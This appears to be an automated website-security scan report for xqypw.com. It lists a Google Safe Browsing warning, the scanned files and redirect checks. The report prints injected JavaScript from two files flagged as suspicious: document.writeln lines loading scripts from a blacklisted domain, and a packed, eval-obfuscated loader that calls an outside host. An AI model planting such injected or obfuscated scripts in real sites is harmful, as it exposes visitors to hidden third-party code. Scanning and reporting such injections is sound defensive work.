Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xqypw.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://xqypw.com/ | 200 OK Content-Length: 5923 Content-Type: text/html | clean |
http://xqypw.com/js.js | 200 OK Content-Length: 744 Content-Type: application/x-javascript | suspicious |
Page code contains blacklisted domain: dy.xnfdh.info document.writeln("<script language=javascript src=http:\/\/dy.xnfdh.info\/dy.js><\/script>")
document.writeln("<!--ÓÒϽǵã»÷_CPC--><script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?\"\":e(parseInt(c\/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!\'\'.replace(\/^\/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return\'\\\\w+\'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);return p;}(\'a.9(\\\'<0 b=\"d:\/\/c.4.2:5\/8.6?e=k&j=7&l=3&f=i&h=&g=1\"><\/0>\\\');\',22,22,\'script||cc||cpva|899|aspx||cf|write|document|src|vpn|http|action|username|cycsel|lowunionnsername|cainiao123|ad_class|cycteamget|cycteamid\'.split(\'|\'),0,{}))<\/script>") | ||
http://xqypw.com/tj.js | 200 OK Content-Length: 94 Content-Type: application/x-javascript | suspicious |
Page code contains blacklisted domain: dy.xnfdh.info document.writeln("<script language=javascript src=http:\/\/dy.xnfdh.info\/tj.js><\/script>")
| ||
http://js.users.51.la/15651134.js | 200 OK Content-Length: 1981 Content-Type: application/x-javascript | clean |
http://xqypw.com/dfehvbhy/ | 200 OK Content-Length: 3777 Content-Type: text/html | clean |
http://xqypw.com/test404page.js | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://xqypw.com/dfehvbhu/ | 200 OK Content-Length: 4748 Content-Type: text/html | clean |
http://xqypw.com/dfehvbhx/ | 200 OK Content-Length: 2996 Content-Type: text/html | clean |
http://xqypw.com/dfehvbhh/ | 200 OK Content-Length: 2856 Content-Type: text/html | clean |
http://xqypw.com/dfehvbhv/ | 200 OK Content-Length: 4555 Content-Type: text/html | clean |
http://xqypw.com/dfehvbva/ | 200 OK Content-Length: 2948 Content-Type: text/html | clean |
http://xqypw.com/dfehvbvq/ | 200 OK Content-Length: 3847 Content-Type: text/html | clean |
http://xqypw.com/dfehvbvb/ | 200 OK Content-Length: 4628 Content-Type: text/html | clean |
http://xqypw.com/dfehvbvt/ | 200 OK Content-Length: 2884 Content-Type: text/html | clean |
http://xqypw.com/dfehvbvz/ | 200 OK Content-Length: 4510 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: xqypw.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Sep 2014 11:08:30 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/html
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: xqypw.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Sep 2014 11:08:30 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/html
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: xqypw.com
Referer: http://www.google.com/search?q=xqypw.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: xqypw.com
Referer: http://www.google.com/search?q=xqypw.com
Result:
The result is similar to the first query. There are no suspicious redirects found.